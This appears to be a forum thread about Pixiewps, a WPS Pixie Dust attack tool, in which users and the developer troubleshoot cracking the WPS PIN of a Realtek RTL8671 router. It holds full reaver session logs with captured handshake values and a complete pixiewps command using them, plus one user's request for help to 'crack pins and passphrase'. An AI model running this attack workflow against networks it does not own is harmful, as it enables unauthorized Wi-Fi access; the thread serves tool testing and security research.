Pixiewps: wps pixie dust attack tool

[Saydamination]

Hello , @Wiire @Kcdtv


Chipset : Realtek RTL8671

Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

Command : pixiewps -e -r -s -z -a -n -f

I m waiting for 3 hours and Pixiewps is continiou...

What can I do ? Suggestion?

a ) Give up

b) Continiou , No risk no fun

[kcdtv]

We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
But wire has been told that some realteck chipset could go back until 1970
so if you can leave it that would be great.
This chipset could be the one... it is not form the X project serie, so it has good chance.
Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
I was also thinking about an option that allows to define a point in time.
Let's say i choose 01-01-2012 00:00
Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
that maybe a bit weird and strange but i thought it may be intersiting
cheers

[wiire]

We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
But wire has been told that some realteck chipset could go back until 1970
so if you can leave it that would be great.
This chipset could be the one... it is not form the X project serie, so it has good chance.
Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
I was also thinking about an option that allows to define a point in time.
Let's say i choose 01-01-2012 00:00
Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
that maybe a bit weird and strange but i thought it may be intersiting
cheers

Yes now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said I run it on my desktop PC which takes only 20 minutes to exaust the keyspace so... yeah...

If some of you get:

"[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."

But doesn't find the pin after the --force bruteforce (and your computer time is ok) let me know. I assumed that the router cannot have set time to future but... you never know...

[wiire]

Hello , @Wiire @Kcdtv


Chipset : Realtek RTL8671

Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

Command : pixiewps -e -r -s -z -a -n -f

I m waiting for 3 hours and Pixiewps is continiou...

What can I do ? Suggestion?

a ) Give up

b) Continiou , No risk no fun

3 hours...?

I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

[Saydamination]

3 hours...?

I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

Hello Wiire,

Test Finished ... I m not lucky..

Reaver Results:

Code:

Associated with 90:F6:52:xX:xX:BX (ESSID: x)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
[P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73
[P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a
[+] Sending M2 message
[P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
[P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 13 s
[Pixie-Dust]  
[Pixie-Dust]   [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]

Pixiewps Results:

Code:

pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45

 Pixiewps 1.1

 [-] WPS pin not found!
[*] Time taken: 27220 s

Pin:12345670

[wiire]

Hello Wiire,

Test Finished ... I m not lucky..

Code:

[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45

There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.

[jenisbob]

3 hours...?

I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

Dear Wiire,
i am not getting error : Pixiewps not getting Hash File

I only get E-Nounce PKE R-Nounce PKR and AUthkey only no hash

please guide me further guidance so that i can crack pins and passphrase

Thanks in advance
jenisbob